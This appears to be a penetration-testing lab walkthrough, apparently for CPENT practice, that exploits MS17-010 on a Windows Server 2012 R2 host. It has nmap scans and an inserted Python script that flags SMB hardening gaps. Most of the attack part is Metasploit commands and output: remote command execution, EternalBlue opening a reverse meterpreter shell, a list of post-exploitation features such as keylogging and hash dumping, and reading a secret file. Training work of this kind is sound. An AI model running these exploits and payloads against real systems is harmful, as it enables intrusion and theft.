Next challenge:
The usual nmap port scan:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.30.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 02:10 EDT
Nmap scan report for 172.16.30.4
Host is up (0.021s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.25 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,5985,49155 172.16.30.4 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-26 02:13 EDT
Nmap scan report for 172.16.30.4
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49155/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h19m57s, deviation: 4h02m29s, median: -2s
|_nbstat: NetBIOS name: WIN-SU2M9G4F4S5, NetBIOS user: <unknown>, NetBIOS MAC: 00155d0136ca (Microsoft)
| smb2-time:
| date: 2023-03-26T06:14:30
|_ start_date: 2023-03-26T20:05:07
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WIN-SU2M9G4F4S5
| NetBIOS computer name: WIN-SU2M9G4F4S5\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-03-25T23:14:30-07:00
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 62.90 ms 192.168.200.1
2 62.90 ms 172.16.30.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.06 seconds
An excerpt from that output:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
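The excerpt above is the part of the scan a defender should triage: the smb-security-mode script only produces output over an SMB1 session, and "message_signing: disabled" on a Windows Server 2012 R2 host is exactly the combination that makes MS17-010 worth checking. The following Python script is an added example (not part of this write-up and not an nmap or Metasploit component): it parses the "|"-prefixed host-script block of an `nmap -sC` run into a dictionary and turns the SMB-related scripts into hardening findings. The sample text is the host-script block from the scan above; the finding texts and severities are this example's own choices, and the assumption that smb-security-mode output implies SMB1 is answered is marked in the code.

```python
"""Parse the host-script section of an `nmap -sC` run and flag SMB hardening gaps.

Added example for this write-up; not part of the original post, nmap or Metasploit.
"""
import re
from typing import Dict, List, Optional, Tuple

# Sample input: the host script block from the nmap run above (copied from the scan).
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_clock-skew: mean: 2h19m57s, deviation: 4h02m29s, median: -2s
|_nbstat: NetBIOS name: WIN-SU2M9G4F4S5, NetBIOS user: <unknown>, NetBIOS MAC: 00155d0136ca (Microsoft)
| smb2-time:
|   date: 2023-03-26T06:14:30
|_  start_date: 2023-03-26T20:05:07
| smb2-security-mode:
|   302:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: WIN-SU2M9G4F4S5
|   NetBIOS computer name: WIN-SU2M9G4F4S5\\x00
|   Workgroup: WORKGROUP\\x00
|_  System time: 2023-03-25T23:14:30-07:00
"""

# A script header is "name:" optionally followed by a one-line value (e.g. "|_http-title: Not Found").
SCRIPT_HEADER = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")


def parse_host_scripts(text: str) -> Dict[str, List[str]]:
    """Return {script_name: [body lines]} from nmap's '|'-prefixed script output.

    nmap marks the last line of each script with '|_'; a '|_' line that arrives while
    no script is open is a one-line script. Indentation is ignored, so the function
    also works on output whose leading spaces were collapsed by copy/paste.
    """
    scripts: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            continue
        closes = line.startswith("|_")
        body = line[2:].strip() if closes else line[1:].strip()
        if current is None:
            m = SCRIPT_HEADER.match(body)
            if not m:
                continue
            name, rest = m.groups()
            scripts[name] = [rest] if rest else []
            if not closes:
                current = name
        else:
            scripts[current].append(body)
            if closes:
                current = None
    return scripts


def field(lines: List[str], key: str) -> Optional[str]:
    """Return the value of a 'key: value' line inside one script's body, or None."""
    prefix = key + ":"
    for line in lines:
        if line.startswith(prefix):
            return line[len(prefix):].strip()
    return None


def assess_smb(scripts: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """Turn the SMB host scripts into (severity, finding) pairs for triage."""
    findings: List[Tuple[str, str]] = []
    smb1 = scripts.get("smb-security-mode")
    if smb1 is not None:
        # Assumption: smb-security-mode negotiates over SMB1, so any output here means
        # the SMB1 dialect is still answered by the host.
        findings.append(("high", "SMB1 dialect accepted; disable SMBv1 on the host"))
        signing = field(smb1, "message_signing") or ""
        if signing.startswith("disabled"):
            findings.append(("high", "SMB1 message signing disabled; require signing to block relay and in-path tampering"))
    smb2 = scripts.get("smb2-security-mode", [])
    if any("enabled but not required" in line for line in smb2):
        findings.append(("medium", "SMB2 signing enabled but not required; set RequireSecuritySignature=1"))
    os_line = field(scripts.get("smb-os-discovery", []), "OS") or ""
    # OS families covered by the MS17-010 bulletin (Vista/2008 through 10/2016).
    if re.search(r"Windows (Server 20(08|12|16)|Vista|7|8(\.1)?|10)\b", os_line):
        findings.append(("info", f"OS '{os_line}' is in the MS17-010 affected range; verify the patch level"))
    return findings


if __name__ == "__main__":
    for severity, message in assess_smb(parse_host_scripts(SAMPLE_NMAP_OUTPUT)):
        print(f"[{severity:6}] {message}")
```

Running the script on the sample prints two high findings (SMB1 answered, SMB1 signing disabled), one medium (SMB2 signing not required) and one info line about the OS family; the same parser can be pointed at the full `-oN` output of a larger sweep, since it ignores everything that is not a script line.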
In fact, from this section alone an experienced tester would already suspect MS17-010. Assuming it is present, launch Metasploit and try it: (CPENT imposes no limit on how many times it can be used)
┌──(root㉿kali)-[~]
└─# msfconsole
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > show options
Module options (auxiliary/admin/smb/ms17_010_command):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
WINPATH WINDOWS yes The name of the remote Windows directory
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
[*] 172.16.30.4:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 172.16.30.4:445 - Built a write-what-where primitive...
[+] 172.16.30.4:445 - Overwrite complete... SYSTEM session obtained!
[+] 172.16.30.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] 172.16.30.4:445 - Getting the command output...
[*] 172.16.30.4:445 - Executing cleanup...
[+] 172.16.30.4:445 - Cleanup was successful
[+] 172.16.30.4:445 - Command completed successfully!
[*] 172.16.30.4:445 - Output for "net group "Domain Admins" /domain":
The request will be processed at a domain controller for domain WORKGROUP.
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Note that auxiliary modules are reconnaissance-type tools; what module 2 tells us is that the DC's domain is WORKGROUP.
msf6 auxiliary(admin/smb/ms17_010_command) > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 172.16.30.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Module 3 tells us this host is very likely vulnerable to MS17-010.
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.18.193 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.30.4
rhosts => 172.16.30.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.200.4
lhost => 192.168.200.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
lport => 8081
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.200.4:8081
[*] 172.16.30.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.30.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter 9600 x64 (64-bit)
[*] 172.16.30.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.30.4:445 - The target is vulnerable.
[*] 172.16.30.4:445 - shellcode size: 1283
[*] 172.16.30.4:445 - numGroomConn: 12
[*] 172.16.30.4:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[+] 172.16.30.4:445 - got good NT Trans response
[+] 172.16.30.4:445 - got good NT Trans response
[+] 172.16.30.4:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.16.30.4:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.16.30.4:445 - good response status for nx: INVALID_PARAMETER
[+] 172.16.30.4:445 - good response status for nx: INVALID_PARAMETER
[*] Sending stage (200774 bytes) to 172.16.30.4
[*] Meterpreter session 1 opened (192.168.200.4:8081 -> 172.16.30.4:49158) at 2023-03-26 02:42:57 -0400
Even though there is no Windows Server 2012 R2 entry in the target list, the exploit still succeeded.
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > search -f secret.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\Documents\Secret.txt 10 2021-12-22 01:40:18 -0500
meterpreter > cat c:\\Users\\Administrator\\Documents\\Secret.txt
axm42fk2gp
You can also enter shell to drop into the target's environment and look for the file there:
meterpreter > shell
Process 864 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd \
cd \
C:\>dir secret.txt /s
dir secret.txt /s
Volume in drive C has no label.
Volume Serial Number is A898-C5B1
Directory of C:\Users\Administrator\Documents
12/21/2021 11:40 PM 10 Secret.txt
1 File(s) 10 bytes
Total Files Listed:
1 File(s) 10 bytes
0 Dir(s) 125,540,614,144 bytes free
C:\>type C:\Users\Administrator\Documents\Secret.txt
type C:\Users\Administrator\Documents\Secret.txt
axm42fk2gp